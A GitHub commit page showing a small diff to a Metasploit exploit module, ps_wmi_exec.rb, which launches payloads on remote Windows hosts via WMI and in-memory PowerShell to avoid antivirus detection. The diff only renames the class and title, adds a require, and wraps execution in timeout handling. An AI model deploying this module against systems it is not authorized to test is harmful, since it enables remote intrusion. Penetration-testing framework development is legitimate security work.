Skip to content

Commit e1ff37f

Browse files
wchen-r7wchen-r7
committed
Title change and handling Rex::TimeoutError exception
1 parent 7b83720 commit e1ff37f

File tree

1 file changed

+17
-11
lines changed

1 file changed

+17
-11
lines changed

modules/exploits/windows/local/ps_wmi_exec.rb

Lines changed: 17 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -1,20 +1,15 @@
1-
# -*- coding: binary -*-
2-
31
##
42
# This module requires Metasploit: http://metasploit.com/download
53
# Current source: https://github.com/rapid7/metasploit-framework
64
##
75

8-
##
9-
# Ideally the methods to create WMI wrapper functions and their callers
10-
# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
11-
##
126

137
require 'msf/core'
148
require 'msf/core/post/windows/powershell'
159
require 'msf/core/post/windows/priv'
10+
require 'msf/core/exploit/powershell/dot_net'
1611

17-
class Metasploit3 < Msf::Exploit::Local
12+
class MetasploitModule < Msf::Exploit::Local
1813
Rank = ExcellentRanking
1914

2015
include Msf::Post::Windows::Powershell
@@ -23,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Local
2318

2419
def initialize(info={})
2520
super(update_info(info,
26-
'Name' => "Authenticated WMI Exec via Powershell (Local Exploit)",
21+
'Name' => "Authenticated WMI Exec via Powershell",
2722
'Description' => %q{
2823
This module uses WMI execution to launch a payload instance on a remote machine.
2924
In order to avoid AV detection, all execution is performed in memory via psh-net
@@ -117,7 +112,6 @@ def build_script
117112
end
118113

119114
def exploit
120-
121115
# Make sure we meet the requirements before running the script
122116
unless have_powershell?
123117
fail_with(Failure::BadConfig, 'PowerShell not found')
@@ -137,7 +131,13 @@ def exploit
137131
return
138132
end
139133

140-
print_good("#{datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)}")
134+
begin
135+
psh_output = datastore["RHOSTS"] ? psh_exec(script) : psh_exec(script,true,false)
136+
print_good(psh_output)
137+
rescue Rex::TimeoutError => e
138+
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
139+
end
140+
141141
vprint_good('PSH WMI exec is complete.')
142142
end
143143

@@ -176,7 +176,13 @@ def ps_wmi_exec(opts = {})
176176
177177
EOS
178178

179-
return ps_wrapper
179+
return ps_wrapper
180180
end
181181

182182
end
183+
184+
185+
#
186+
# Ideally the methods to create WMI wrapper functions and their callers
187+
# should be in /lib/msf/core/post/windows/powershell/ps_wmi.rb.
188+
#

0 commit comments

Comments
 (0)